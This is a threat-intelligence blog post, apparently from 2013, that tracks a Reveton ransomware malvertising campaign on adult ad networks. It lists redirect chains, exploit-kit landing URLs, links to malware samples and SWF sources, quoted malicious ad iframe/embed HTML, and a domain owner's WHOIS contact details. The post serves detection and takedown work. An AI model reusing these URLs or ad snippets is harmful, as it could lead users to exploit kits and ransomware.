[en] Reveton Malvertising campaign

My bad on the October 10 EDIT  : http://www.malekal.com/2013/05/29/en-ero-advertising-malvertising-for-flimrans-ransomware-campaign/
I
t’s not Flimrans Ransomware but Reveton with a new Exploit Kit called « Angler EK »
Here an update of the Malvertising at TrafficHolder :

http://candy.dandydaddy.net/geo6/go.php?sid= (88.214.200.190) 0 – @ VT https://www.virustotal.com/fr/url/2311b4dc009ad342529377a3ee9e2a0f4c1e291b5bc546b947368129042abef0/analysis/1381736738/
http://55grey.live1asmin.com/monster/monster.php (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/6ddf5caa515b108d06f2725893f84b4a8265c903531560eab684adbccfb9e91c/analysis/1381736744/
http://efjyp.carpetcleaningplymouthmn.com/ak0iwxd15s

Sample : http://malwaredb.malekal.com/index.php?hash=b04c68fc55a02e91c8c6041393ab4ffd

Reveton_TrafficHolder

Reveton_TrafficHolder

EDIT –

update from a one i already spoke (milf-bitches.com) there : http://www.malekal.com/2013/05/29/en-ero-advertising-malvertising-for-flimrans-ransomware-campaign/

http://ilikeshavedpussy.com/ (178.214.121.17) – 1 @ https://www.virustotal.com/fr/url/a6beccc02362571b724b9ee25b66dadbf43f771892806afe09bc94897bbc048f/analysis/1381774125/
http://mfzoomakridgetluszcze.pacificbuilders.us/secure_320.swf
http://baby.blindfoldtest.com/ (185.25.51.146)
http://newstheblues.la-z-boy-repair.com/g1ex23cu9i

Sample : http://malwaredb.malekal.com/index.php?hash=6c51d42f857576fb9523405f96274456

Reveton_Malvertising

Reveton_Malvertising2

EDIT 15 October

http://50den.com/
http://beskrivelsesramme.govention.com/312_300x250.swf – 0 @ VT https://www.virustotal.com/fr/url/afad635c188316eebeebc2ae19a86f0b42754b6c78bc4ffd221e776e1d128db4/analysis/1381830086/
http://sorry.itch-gone.com/ – 0 @ VT https://www.virustotal.com/fr/url/b530c9a05be0b58d42e078f6c1665cbef0277908e6143a03d0cdb76081abbfc6/analysis/1381830092/
http://autauga.elementengineering.us/u0oj982n1u
http://autauga.elementengineering.us/0u0oj982n1ukhj
http://autauga.elementengineering.us/META-INF/services/javax.xml.datatype.DatatypeFactory
http://autauga.elementengineering.us/META-INF/services/javax.xml.datatype.DatatypeFactory
http://autauga.elementengineering.us/1u0oj982n1ukhj

SWF Sample : http://malwaredb.malekal.com/index.php?hash=39b24afbf28a11819a90d26263b81eef
Reveton Dropper : http://malwaredb.malekal.com/index.php?hash=b49223a3e4229a884c0213fe22476d29

I have contacted the webmaster at 50den – it will be removed soon !

Reveton_Malvertising

EDIT

http://hit.trafficholder.com/cgi-bin/traffic/process.fcgi?a=ace&n=&r=
http://33.suck-my-candy.com/geo/geo.php => 0 VT @ https://www.virustotal.com/fr/url/eb006b0cfe778491d0657285ec15078116b5837eacda851fb4b83f5842127b76/analysis/1382109790/
http://monotricgelykes.magnificentmilecompanions.com/sn35aypwai
http://monotricgelykes.magnificentmilecompanions.com/0sn35aypwaikhj
http://monotricgelykes.magnificentmilecompanions.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://monotricgelykes.magnificentmilecompanions.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://www.hot-sex-tube.com/img2.php?ref=sex-hq.com&t=d29e5296

Sample : http://malwaredb.malekal.com/index.php?hash=4f683232ae146b97b0e2f92589ac9ce6

malvert

EDIT

http://stun.tileremovalpompano.com/291111.js (144.76.141.103) – 1 @ VT : https://www.virustotal.com/fr/url/d52887bd77c0761efa178dd8604bfb40d02adc61cf7e6f0bcd277f7d3c1e0fd4/analysis/1382132371/
http://developedness-leichtglaeubigste.acesdiamondscompanions.com/11.swf (144.76.141.212) – 0 VT https://www.virustotal.com/fr/url/a29b92e5defc72638da01e4e50f6742ad7bbe61b8eeee105910f3146c451fd15/analysis/1382132391/
http://admedia.midmemedia.com/ (185.25.51.157) – 0 VT https://www.virustotal.com/fr/url/b55cc41d9201edafece58fc133de36f50baf6dad786651c0f8bb5043586089cd/analysis/1382132381/
http://overfastidiousalarmgauge.creativecasualcuisine.net/xhsvw33w9m

Reveton_Malvertising Reveton_Malvertising2

EDIT October 19

on x3xtube :

http://entomion.notyouraveragejoes.mobi/312_300x250.swf (144.76.141.213) – 1 @ VT https://www.virustotal.com/fr/url/797d6a3b66710dc7302cae3abefc7814212c5d68e7d1b3e4bcdcf5ef123dfc0b/analysis/1382218399/
http://slide.quick-steplaminateflooring.org/?302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c333132 (144.76.117.28) – 0 @ VT https://www.virustotal.com/fr/url/bd10350d2531770d5c09f310a502dac0cad02f0a32ca1367f9bf9e22cfa0b93e/analysis/1382218410/
http://privatehomeclips.com/videos/cute-wife-sucking-pov-getting-his-hot-cum-on-face/?promo=1102 (109.206.188.19) – 2 @ VT https://www.virustotal.com/fr/url/a4a34ff6f2c73cd27e16ced2f79662d682afda07bb822f4bb8ea2ceb003d0f63/analysis/1382218421/
http://rebrousserontscozzand.notyouraveragejoes.com/6nmlys9mmn

The SWF Script : http://pjjoint.malekal.com/files.php?read=20131019_v12p12s6k12y6
Sample : http://malwaredb.malekal.com/index.php?hash=5d5caa450d42ebb29e591815754cc8c2 and http://malwaredb.malekal.com/index.php?hash=540fb4f6aaa533dbdf03a2be6195ee6d
Admin Name:Timothy Shimko
Admin Organization:Not Your Average Joe’s
Admin Street1:151 Campanelli Dr
Admin Street2:Suite C
Admin City:Middleborough
Admin State/Province:Massachusetts
Admin Postal Code:02346
Admin Country:US
Admin Phone:+1.7742132800
Admin FAX:+1.7742132899
Admin Email:tshimko@nyajoes.com

with tshimko@nyajoes.com – we also have :
Nyajoes.biz
Joe-to-you.com

(the URL for the Urausy banner is http://adsholder.net/banner_350.flv 1 @ VT https://www.virustotal.com/fr/url/17585195a1ba2b9706ebe1b4e55291fbb2469d2e86c9cd0d16212ac4f201f7aa/analysis/1382218572/)

Reveton_Malvertising Reveton_Malvertising2 Reveton_Malvertising3

EDIT October 21

http://dolly.shemale-star.com/6/go.php?sid=2 (88.214.200.190) – 0 VT ps://www.virustotal.com/fr/url/f49daaec20fe2ff26bcb52ba3027a37aa8f524d8d052e1da86e3c6d314bbc2e7/analysis/1382354215/
http://66lab.lucysextape.com/geo/geo.php (88.214.200.190) – 0 @ VT https://www.virustotal.com/fr/url/fce951755d723daf057a09291ed5023ebbd1498f826dae3b558428543059dcc6/analysis/1382354223/
http://hawkbell.me-cfscommunity.com/ej8lejnjjg

Sample : http://malwaredb.malekal.com/index.php?&hash=2b2d5333eaba0e94acc37491419aae03

Reveton_Malvertising Reveton_Malvertising2

EDIT October 28

Following a malvertising at www.overthumbs.com thoses last days – it dropped an Urausy but today it’s a Reveton : http://urlquery.net/report.php?id=7190829 (see the  #2  and #3 Javascript)

http://adstraffik.pulseyourself.com/409996.js (144.76.141.102)
–> http://completa.alphabetlife.com/banner2_1367008940.swf
–> SWF/JS :: outfitinvestigate.com (s2438.soft-com.biz)
.. outfitinvestigate.com/add/getJavaInfo.jar
.. outfitinvestigate.com/add/addon2.js
.. outfitinvestigate.com/add/addon2.js
( 88.214.227.8/add/getJavaInfo.jar
88.214.227.9/add/getJavaInfo.jar
88.214.227.10/add/getJavaInfo.jar
88.214.227.11/add/getJavaInfo.jar )
POST http://88.214.227…./?url=1
Then Exploit kit : http://bapujds.thehavazoo.com:6173/acct_login/etc/filefun.php?join=3
Sample : http://malwaredb.malekal.com/index.php?hash=d785b296243f6c77f18ee6cbfc421023

 

Today :

http://adstraffik.pulseyourself.com/409996.js (144.76.141.102) – 4 @ VT https://www.virustotal.com/fr/url/5cd0ae6b655832dfde242d6af289233d47bb8f0f638cebd545c014960ab679df/analysis/1382992002/
http://diastereoisomer.securiconsystems.com/banner2_1367008940.swf (144.76.141.213) – 1 @ VT https://www.virustotal.com/fr/url/5af611707cc5fe458d183751e38a88652fa47be1bfa737329cc2fae56979f2e0/analysis/1382992297/
http://day.thehighgrovesingers.com/?31302e312e332e32337c7c312e372e302e367c7c31302e332e3138332e31317c7c333134 (144.76.117.6)
http://attention.lionsclubpacesetters.com/ (185.25.51.151)
Then Exploit kit : http://devisengeschaeft.passaicarea.com/j18qwols3y

 

SWF sample : http://malwaredb.malekal.com/index.php?hash=148a8050eb490609125678b073b0345d
Dropper : http://malwaredb.malekal.com/index.php?hash=bdef04e22bdf625b6c142bab34fa4b56

SWF sources :
http://pastebin.com/tWVdk9Sj
http://pastebin.com/xiH9VSbz

The SWF is filtering the browser and plugins versions (PDF/Flash and Java) – Java version must be between 1.6 and 1.7.0.21 (thanks to the security dialogs).
The plugins versions are encoded in the external URLs.

Reveton_Malvertising Reveton_Malvertising2 Reveton_Malvertising3

 

There is the same kind at privatehomeclips.com :

http://partners.privatehomeclips.com/300250gay.swf?clickTAG=http://3dgaytales.com/
http://account.castilloroofinginc.com/?31302e312e332e32337c7c312e372e302e367c7c31302e332e3138332e31317c7c333137 (144.76.117.27)
but the redirection to the exploit kit seems to be disable.

The SWF sources are a bit different but the goal is the same :
http://pastebin.com/2vvkybd9
http://pastebin.com/uWtiNQBv

EDIT October 29 (SWF Malvert & Creoads)

okay, the malvertising at www.overthumbs.com is now cleaned – it’s was on tuberewards net .doublegear.com / trw12.com
The redirection to the Exploit kit at privatehomeclips.com is now enabled – Sample : http://malwaredb.malekal.com/index.php?hash=54deed208948bb5321c65f780f609f27
Trying to get it removed

privatehomeclips_malvertising

There is also a malvertising on creoads network (http://creoads.com/) – i have contact them, will see if they move

http://creoads.com/server/delivery/render/7986202730/7985958849/get?zoneid=7986202730&domain=overthumbs.com&cat=amateur&st=tube&host=1.5&uid=7705052716&crid=7985958849&location=http%3A%2F%2F192.168.1.5%2Ftest.html&referrer=
http://carriage.amazon-rainforest-facts.com/862189.html (144.76.141.100) – 0 @ VT : https://www.virustotal.com/fr/url/aaefaf55ecde18c43bdecd77ebad5a7cc3dab251a7e7aab360ebb61702d52664/analysis/1383034525/
http://minutissimic.prymesecurity.com/311_728x90.swf?clickTAG=http://www.nudeblackwomenphotos.com (144.76.141.213)

Please blacklist carriage.amazon-rainforest-facts.com

creoads_malvertising

EDIT October 30 (Traffichold Hack)

traffichold.com malvertising

http://cs.traffichold.com/www/delivery/afr.php?zoneid=109&cb=INSERT_RANDOM_NUMBER_HERE&wm=16495&pr=4021117&prd=300×250&ts=failover&tsd=banner&prm=rev
http://offline.bizzapp.com/pagead/show_ads.js (85.17.156.88) – 1 @ VT https://www.virustotal.com/fr/url/cd899b5c7af4496e20cd4abdb4db4c2595c9c2d51bd5090bd6d6dd7a52df990d/analysis/1383154059/
http://benit.citizensinvestigativeservice.com/y2cebej2w6

http://cs.traffichold.com/www/delivery/afr.php?zoneid=932&cb=&wm=16495&prm=rev&pr=4046036&prd=&keyword=extreme,pissing&ts=bcbanner&tsd=pc_ban_global_18_300x250_all
http://orgasm.ratemysketa.com/pagead/show_ads.js (85.17.156.88) – 1 @ VT https://www.virustotal.com/fr/url/a10c0043df0c0ba2a8d4bc001283326b53a45c18ce2992e8f4eb315bc0da1d80/analysis/1383154745/
http://geita.antiquipawntique.com/upkeuge367

Sample : http://malwaredb.malekal.com/index.php?hash=bf8e9e4eac5113b8a38eac10c05eb9de

offline.bizzapp.com ratemysketa.com

EDIT October 31 (Traffichold hack)

http://syndication.traffichaus.com/adserve/index.php?z=142
http://cs.traffichold.com/www/delivery/afr.php?zoneid=1387&cb=1969502
http://forum.fundsrecovered.com/pagead/show_ads.js (85.17.156.88) – 0 @ https://www.virustotal.com/fr/url/0bb5a46b411c644bec93d55a111a9a6a92eb5fc6f04aab5b0da2340236e74a47/analysis/1383231117/
http://biegroman.allergyzapper.com/vosu9jqyys

Sample : http://malwaredb.malekal.com/index.php?hash=1883e78a129f379296f590af83e50a24

forum.fundsrecovered.com2 forum.fundsrecovered.com3forum.fundsrecovered.com

EDIT November 4 (TrafficHolder Malvert)

both on trafficholder :
http://oldturtle.net/ (72.249.5.64) 0 @ VT https://www.virustotal.com/en/url/8697dfa087af0050713be394b8b2fdb757f2521e9adffeed1eafcac347ec5753/analysis/1383575732/
http://tiplej.pw/js/style.php (188.116.23.43) – 0 @ VT https://www.virustotal.com/en/url/a60de635f077ee9597889f96ed90cdc819cc2f8c43e14d767a67a1344d0c471d/analysis/1383575577/
http://tiplej.pw/tr.php
http://xogh4pe.nowebsto.net:8000/etyfxbmjgtgxp?zjsurm=1307818

http://londonprivatehire.net/tds/fr.php (199.168.136.218) – 1 @ VT https://www.virustotal.com/en/url/4666a48790127181a10d5e2c64c40ffcb6081bf6183afe57bf855f14b409e97a/analysis/1383576598/
http://iph4tha.nowebsto.net:8000/aforxvxnt?fxfvcqquckms=6061419

malvert_londonprivatehire.net malvert_londonprivatehire.net2 tiplej.pw_malvertising tiplej.pw_malvertising2 tiplej.pw_malvertising3

 

EDIT November 7 (Creoads)

On creoads network :

http://creoads.com/server/delivery/render/7695485983/7695416534/get?zoneid=7695485983&domain=homemoviestube.com&cat=multiniche&st=tube&host=trw12.com&uid=7687685088&crid=7695416534&location=http%3A%2F%2Fwww.homemoviestube.com%2Fvideos%2F155604%2Fcum-facial-for-little-blonde.html&referrer=http%3A%2F%2Fwww.homemoviestube.com%2Fvideos%2F155604%2Fcum-facial-for-little-blonde.html
http://law.letsimmigrate.com/364754.html (144.76.141.102) – 0 @ VT https://www.virustotal.com/en/url/3f4e438d783917419d65ff0adc613f40d423ad4dd925712c0fe0fb59e04fc591/analysis/1383842369/
http://valmistusvaiheissa.senioradvantagenetwork.com/banner2.swf?clickTAG=http://EbonyInvite.com (144.76.141.213) – 0 @ VT https://www.virustotal.com/en/url/96c995558935afbcd6ff37c9fdb7fba3d7c2555e5f4c0f7f18a555e06626f8e7/analysis/1383842386/
http://floor.buriedstructures.com/?333138 (144.76.117.6) 1 @ VT https://www.virustotal.com/en/url/7a327503bf9cca066879b3114d17b6a6ef72e425592cd6ac8bb4ba7866798d84/analysis/1383842394/
http://nation.elegantbucks.com/ (185.25.51.153) – 1 @ VT https://www.virustotal.com/en/url/749b7b7a8affa154c21c09bc4b25a16bd9f34308585a7871163b225c402b594b/analysis/1383842402/
http://modorrillo.syn-flexusa.com/qqf0ya2ve2

Sample : http://malwaredb.malekal.com/index.php?hash=dd0979c85a68c4344b1689c0933cad65

creoads_reveton_malvertising creoads_reveton_malvertising2 creoads_reveton_malvertising3 creoads_reveton_malvertising4

 EDIT November 9 (Creoads)

a new on pornerbros.com  – and yeah, the Urausy malvertising is still online there.

via creoads :

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=pornerbros.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.pornerbros.com%2F272133%2Fsexy-brunette-and-hot-blonde-get-banged.html&referrer=http%3A%2F%2Fwww.pornerbros.com%2F291525%2Fsweet-blonde-gives-dazzling-blowjob.html
http://knife.waytomakemoneyonlyne.com/800_300_250.html (144.76.141.103)
http://xpixelinfojsenmaksuja.myoncoseek.org/800_300_250.swf?clickTAG=http://www.doctorfox.co.uk
http://agree.starlightranchinc.com/?302e302e302e307c7c312e372e302e367c7c31302e332e3138332e31317c7c383030 (144.76.117.29)
http://rvhtmttmllpoligrafica.myoncoseq.com/8qqvm8cqfu (91.231.85.19)

Sample : http://malwaredb.malekal.com/index.php?hash=9ecb9953be391fea8c2295cd0fd4a97f

creoads_pornerbros creoads_pornerbros2 creoads_pornerbros3

EDIT –

The last one has been probably shutdown by Godaddy, all the domains are on Godaddy. According to them, malware guys used hacked account(probably like on the past : http://nakedsecurity.sophos.com/2012/11/23/hacked-go-daddy-ransomware/ ).
Nice support from Godaddy and hat trick to kafeine to point this 🙂

EDIT November 11 (Creoads)

Moved from Godaddy Account to EuroDNS hacked account : luisaviaroma.dk / luisaland.eu

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=judgeporn.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.judgeporn.com%2Fvideos%2Fsexy-brunette-holly-michaels-toys-her-wet-pussy-with-glass-dildo%2F&referrer=http%3A%2F%2Fwww.judgeporn.com%2Fvideos%2Fsexy-brunette-holly-michaels-toys-her-wet-pussy-with-glass-dildo%2F

http://town.luisaviaroma.dk/800_300_250.html – 2 @ VT https://www.virustotal.com/en/url/aa53b1b0d0aa14f9dfaad3f16ef9ce8ad9f920b696f8dffc719a2be5ab05bc92/analysis/1384164812/
http://land.luisaland.eu/800_300_250.swf?clickTAG=http://www.meendo.com/photoalbums/?partner=6688 – 1 @ VT https://www.virustotal.com/en/url/c7aa0f1344e17766fa318ff05bb166847d9b3efe8becead7928fdf3557634a4a/analysis/1384164925/

http://cut.statetaxbrokerage.us/?302e302e302e307c7c312e372e302e367c7c31302e332e3138332e31317c7c383030
http://at.kelseyelectric.com/
http://traspiregrensbepalings.jcpublishers.org/b2qh26s72a

hosted by hetzner :

town.luisaviaroma.dk has address 144.76.136.34
land.luisaland.eu has address 144.76.136.182

Reveton_malvertising

EDIT – November 12 (Creoads)

still creoads :

http://creoads.com/server/delivery/render/8475360172/8475412333/get?zoneid=8475360172&domain=w3schools.com&cat=multiniche&st=tube&host=pornerbros.com&uid=8048310810&crid=8475412333&location=http%3A%2F%2Fwww.pornerbros.com%2F294317%2Fthe-lust-resort-scores-one-again.html&referrer=http%3A%2F%2Fwww.pornerbros.com%2F
http://dl.dropboxusercontent.com/s/fsb3jmurx6j7d77/603_300_250.html (204.236.226.117)
http://hollow.quintalasaves.com/? (144.76.136.250)
http://lock.modernarchaeology.org/ (185.25.51.146)
http://beadhousisrouter.smartworkleadership.com/om9y6ittno

dl.dropboxusercontent.com/s/fsb3jmurx6j7d77/603_300_250.html load the malvert at http://start.sendblaster.hu/603_300_250.swf (144.76.137.26)

Sample : http://malwaredb.malekal.com/index.php?hash=6cfb0e023b3fdb12a4047830265e4892
SWF : http://malwaredb.malekal.com/index.php?hash=903a5ca42293d67d1481e7c5857533b7

Seriously creods ! how it is possible to authorize dropbox links ? do not be suprise if you load malicious content.

Reveton_Malvert Reveton_Malvert2Reveton_Malvert3

EDIT November 15 (Kovter Malvert & Group goo.gl)

Two Malvertising on judgeporn.com :

http://cdn.judgeporn.com/ads/r2.html

<html><head><title></title></head><body style="background-color:transparent; margin:0; outline-offset:0;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="300" height="250" id="banner350" align="middle">
<param name="allowScriptAccess" value="always">
<param name="movie" value="http://advert-creative.net/adultwebdating.flv">
<param name="quality" value="high">
<param name="bgcolor" value="#ffffff">
<embed src="http://advert-creative.net/adultwebdating.flv" quality="high" bgcolor="#ffffff" width="300" height="250" name="ppbanner" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">

</object>
</body>
</html>

~~

http://cdn.judgeporn.com/ads/r3.html

<html><head><title></title></head><body style="background-color:transparent; margin:0; outline-offset:0;">

<iframe width="300" height="250" frameborder=0 scrolling="no" src="https://stats.qualitytrafficmedia.net/?id=Fmnrior8365&track=IRjmfjhd83759&YRnfjfv84674"></iframe>

</body>
</html>

The second is the same kind as Kovter Malvertising we got in the past : http://www.malekal.com/2013/09/27/13323/ but now it’s delivering Reveton
http://stats.qualitytrafficmedia.net:443 – 0 @ VT https://www.virustotal.com/fr/url/611467ca31c7181cf419e14ff181637ad86fac0fff35b3e9fc077c9e45fcfe6c/analysis/1384504603/
http://goo.gl:443
http://towarzyszy-hangman0.domcarga.com/8kc2nne6x9
http://towarzyszy-hangman0.domcarga.com/08kc2nne6x9bik
http://towarzyszy-hangman0.domcarga.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://towarzyszy-hangman0.domcarga.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://towarzyszy-hangman0.domcarga.com/18kc2nne6x9bik

Judgeporn Judgeporn2 Judgeporn3

EDIT – (Group goo.gl)

This one is very interresting, found on 4sex4 but already seen this banners on others website.

4sex4.com

 

 

sunmecdn.com/ads/init.js (108.162.198.76) that send some parameters sun_init.adname etc.4sex4.com3

sunmecdn.com returns the domain of the ads.
here admecnd.com (108.162.196.202)

4sex4.com5

then the domain build the advert with the parameters.
and also an iframe to goo.gl4sex4.com4

then goo.gl redirect to the Exploit Kit.

http://sunmecdn.com/ads/init.js – 1 @ VT https://www.virustotal.com/fr/url/66403eb68003d28abf6ce9e1ef108520b95177f3230087afa2906b8098f5c7ad/analysis/1384520535/
http://admecnd.com/gif/1384518624619/9bf31c7f15/www.4sex4.com/cutelivecams.com_.js – 0 VT https://www.virustotal.com/fr/url/71a063ac1cac4812d0927710cd6fdf12f6d12dda81ea94407dd04f0307915c96/analysis/1384520559/
http://goo.gl:443
http://nagi-kultusministeriums.glablesrealtyteam.com/jedin485xo
http://admecnd.com/gif/0/9bf31c7f15/a/f/loaded=417/y.ping
http://nagi-kultusministeriums.glablesrealtyteam.com/0jedin485xobik
http://nagi-kultusministeriums.glablesrealtyteam.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://nagi-kultusministeriums.glablesrealtyteam.com/META-INF/services/javax.xml.datatype.DatatypeFactory
http://nagi-kultusministeriums.glablesrealtyteam.com/1jedin485xobik

A nice one, probably on others porn websites.

Sample : http://malwaredb.malekal.com/index.php?hash=89c00c50f731d1a0e46748cadc02ebfd

EDIT – Bongacams (group goo.gl)

seen on privatehomeclips.com and also on alotporn.com :

Alotporn.com2

EDIT – BongaCams (Group goo.gl)

so fun at hdteensexvideos.com – two same malvertising :

http://sunmecdn.com/ads/init.js – 2 @ VT https://www.virustotal.com/fr/url/66403eb68003d28abf6ce9e1ef108520b95177f3230087afa2906b8098f5c7ad/analysis/
http://ytrrcdn.com/ads/init.js – 0 @ VT : https://www.virustotal.com/fr/url/b3c87480ad3495d42b52b790c9963a88db782d30962ca77d5f0459fdf40e75e8/analysis/1384536392/
http://admecnd.com/gif/1384535856241/1f0e3dad19/delivery.hornyspots.com/cutelivecams.com_.js
http://admecnd.com/gif/0/70efdf2e17/a/f/loaded=7/y.ping
http://goo.gl:443
http://selfsustainedrazvoj12.domcarga.net/3mps34neoa
http://selfsustainedrazvoj12.domcarga.net/03mps34neoabik
http://selfsustainedrazvoj12.domcarga.net/META-INF/services/javax.xml.datatype.DatatypeFactory
http://selfsustainedrazvoj12.domcarga.net/META-INF/services/javax.xml.datatype.DatatypeFactory
http://selfsustainedrazvoj12.domcarga.net/13mps34neoabik

hdteenmovieshdteenmovies2

EDIT – November 16 (Cleaning Time)

  • twr12.com and hornyspot networks cleaned
  • Alotporn.com cleaned – Google Safebrowsing blacklist it
  • still on judgeporn and privatehomeclips.

alotporn.com_cleaned

EDIT – Malvert @ creoads still online

on realgfporn.com that is with x3xtube.com / judgeporn.com and privatehomeclips often delivering malvertising 😉

creoads_malvertising_reveton

EDIT November 18 (TrafficBroker Malvert)

Both are Trafficbroker malvertising and 0 VT

http://stiles-flooring.pw/tds/fr.php (199.168.136.213)
http://phee9ah.smart-stops.com:8000/bubmfp?soyldbxphkl=6061419

http://topblackcocks.net/ (99.192.172.5)
http://3502.vgj.puc.hku.fpnl.gebaiizx.podogey.in/?186a7d7e2a2a20292a367c7d74716e7d6a61366c6a797e7e717b7a6a77737d6a367b7775

malvert_floorings topblackcocks.net

EDIT – (TrafficHold Hack)

Target Germany

http://cs.traffichold.com/www/delivery/afr.php?zoneid=109&cb=INSERT_RANDOM_NUMBER_HERE&wm=16495&pr=120843&prd=300×250&ts=failover&tsd=banner&prm=rev – 1 @ VT https://www.virustotal.com/fr/url/b7255c1144501908e7c4b76a855638e090c5b87d6e2ade110ab84e5b498ece37/analysis/1384796995/
http://download.jaysontaylor.net/pagead/show_ads.js
http://hurstbeech.1800etrade.com/e4le20i9wv

Reveton_jaysontaylor.net Reveton_jaysontaylor.net2

EDIT November 20 (TrafficHold Hack)

Still malvertising on traffichold.com – starting to believe it’s a crappy 🙂

http://free.gt-cv.com/pagead/show_ads.js
http://wellstea.ecuadoreasy.com/5g8tpk4obq

trafficholder trafficholder2 trafficholder3

EDIT – November 21 (TrafficHold Hack)

Traffichold.com malvertising still online.
All the top pages have an iframe 1px – seems to be a hack.

I sent a bottle in the sea – will see!

traffichold_malvertising_2111 traffichold_malvertising_2111_2

EDIT – November 22 (Kovter Malvertising)

in wild for the last days – same malvertising as kovter on the past : http://www.malekal.com/2013/09/27/13323/

http://statistics.brandlinkserver.net:443 (192.200.125.120)
https://www.virustotal.com/fr/url/8fb3c20e5946a7430595ef843fed59568d8513b1a6c73be14ecc73221018d744/analysis/1385022540/

http://serv.emediatrust.com:443 (192.133.137.45)
https://www.virustotal.com/fr/url/94e5248b40367a050a8fe65d883a8f4a12841d27ab07f80060855f6580a18e1b/analysis/1385022599/

http://rpc.medialegator.net:443 (NO DNS)
https://www.virustotal.com/fr/url/cc4093030256d430ba4289e4ea408c311ce7d4bc42a3e0527220844c96860346/analysis/1385022638/

http://stats.rotationfactor.net:443 (192.200.125.118)
https://www.virustotal.com/fr/url/8fc96e60b85fedb413a301e8932fe237c2f3407ec5bbc7232a7a1870c0f2108a/analysis/1385022659/

http://serv.medialiteadv.com:443 (192.133.137.8)
https://www.virustotal.com/fr/url/8fb3c20e5946a7430595ef843fed59568d8513b1a6c73be14ecc73221018d744/analysis/1385022688/

http://serv.mindxmedia.net:443 (83.133.110.60)
https://www.virustotal.com/fr/url/b32d654de3d4be7da850c125faeb60a46837ce5571f9a6096da49274c963133a/analysis/1385022753/

http://serv.xmediahost.net:443 (192.133.137.49)
https://www.virustotal.com/fr/url/f6bbe5b2fb7200d1e8fb0903c858e08abd0bc12d629b6a8c0bfb3fb7d9963f26/analysis/1385037548/

Reveton_domain_pl  malvertising_pornoxo2

EDIT November 24 (Group Goo.gl)

still on judgeporn via jpspots.com again.
Same kind of the bongacams group – the « gool.gl » group.

http://www.jpspots.com/sp/delivery/js.php?advplaces=19
http://smpnet.net/js/en/6/4198323baa/1385306360954/http:~~cdn.judgeporn.com~ads~r1.html/http:~~www.judgeporn.com~videos~angela-valentino-fills-her-mouth-with-a-huge-black-cock~/wpx07C/300×250.js – 1 @ VT https://www.virustotal.com/fr/url/e971285952ebf1bb3905317d8d7994fac7b7508f2d9a870b06ad3899c63859c1/analysis/1385308062/
http://blufonts.com/getfonts/user/2RhkV5/3324/sansation_400.font.js – 1 @ VT https://www.virustotal.com/fr/url/ed8611468f0905710c9c8a28b2885853acd98844e75a256a5cf9ca205c0eab36/analysis/1385308116/
http://blufonts.com/getfonts/user/2RhkV5/3324/cufon-yui.js
http://goo.gl:443
http://hoogschatte.cellbureaus.com/cwd9hsj489

~~

smpget load xxfonts.com stuffs

malvertising_smpnet

malvertising_smpnet2The iframe goo.gl is build there – full JS : http://pastebin.com/RWnfry3w

malvertising_smpnet5
malvertising_smpnet3
malvertising_smpnet4

EDIT (Hornysposts Malvertising)

http://delivery.hornyspots.com/?spot=53&track=69583&unique=0.48806754487283316
http://delivery.hornyspots.com/click.php?x=c8b6e207ca0e5125d70ddf37&r=hdteensexvideos.com&t=1385333457&s=53&c=661&m=438&track=69583
http://little-slut.com/ (69.64.43.212) – 2 @ VT https://www.virustotal.com/fr/url/3bd87026f299458d27754cbeccb5c8307e834ee5a5f555255ca9665aa7c0d30a/analysis/1385334082/
http://arresterahangwiegen.printabledigitalinvitations.com/05edg59cyg

http://urlquery.net/report.php?id=7952312

hornyspots_malvertising_reveton hornyspots_malvertising_reveton2

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 146 times, 4 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *